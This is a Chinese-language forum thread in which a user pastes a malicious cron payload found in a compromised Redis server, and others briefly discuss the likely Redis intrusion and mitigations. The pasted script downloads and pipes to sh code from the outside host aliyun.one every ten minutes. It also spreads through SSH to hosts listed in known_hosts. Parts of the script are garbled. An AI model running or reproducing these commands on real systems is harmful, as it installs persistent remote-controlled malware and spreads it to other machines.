龙腾宇内 大佬有话说 : 2019-12-3 16:21:12
发现一个有意思域名,http://aliyun.one/,打开一看更不得了
今天整理redis数据库的时候,突然发现一些可疑的数据,就打开看了下。
是一对定时任务的数据,都是定时访问一个网址
aliyun.one
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp chmod 1777 /tmp echo "*/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c ‘import urllib;print urllib.urlopen("http://aliyun.one").read()’)|sh"|crontab – cat > /etc/crontab </dev/null 2>&1 &" & done fi for file in /home/* do if test -d $file; then if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then for h in $(grep -oE "b({1,3}.){3}{1,3}b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c ‘import urllib;print urllib.urlopen("http://aliyun.one").read()’)|sh >/dev/null 2>&1 &" & done fi fi done #
大家可以看看,感觉很6.哈哈
shenyina 大佬有话说 : 2019-12-3 16:27:16
这个域名打不开,不过有谷歌快照
这个定时任务干啥用
一位不知名网友 大佬有话说 : 2019-12-3 16:27:23
没看出来有什么特点
microlz 大佬有话说 : 2019-12-3 16:34:29
redis漏洞吧
龙腾宇内 大佬有话说 : 2019-12-3 16:36:02
shenyina 大佬有话说 : 2019-12-3 16:27
这个域名打不开,不过有谷歌快照
这个定时任务干啥用
修改你的 登录秘钥
龙腾宇内 大佬有话说 : 2019-12-3 16:37:13
microlz 大佬有话说 : 2019-12-3 16:34
redis漏洞吧
不好说,我这是在办公电脑上发现的
ailaotan 大佬有话说 : 2019-12-3 16:39:16
牛皮,代码的意思好像是把他的公钥写入你的服务器,然后他就能用密钥登录了
妖言惑众 大佬有话说 : 2019-12-3 16:41:14
白票加头盔
ailaotan 大佬有话说 : 2019-12-3 16:45:29
redis一般不要开放外网,本身redis性能很高,官方建议如果开外网,设置密码都尽可能长,并且不要用6379默认端口
龙腾宇内 大佬有话说 : 2019-12-3 16:48:51
ailaotan 大佬有话说 : 2019-12-3 16:45
redis一般不要开放外网,本身redis性能很高,官方建议如果开外网,设置密码都尽可能长,并且不要用6379默认 …
我就很郁闷,我那就是个测试服务器,啥都没安装。不知道是如何被入侵的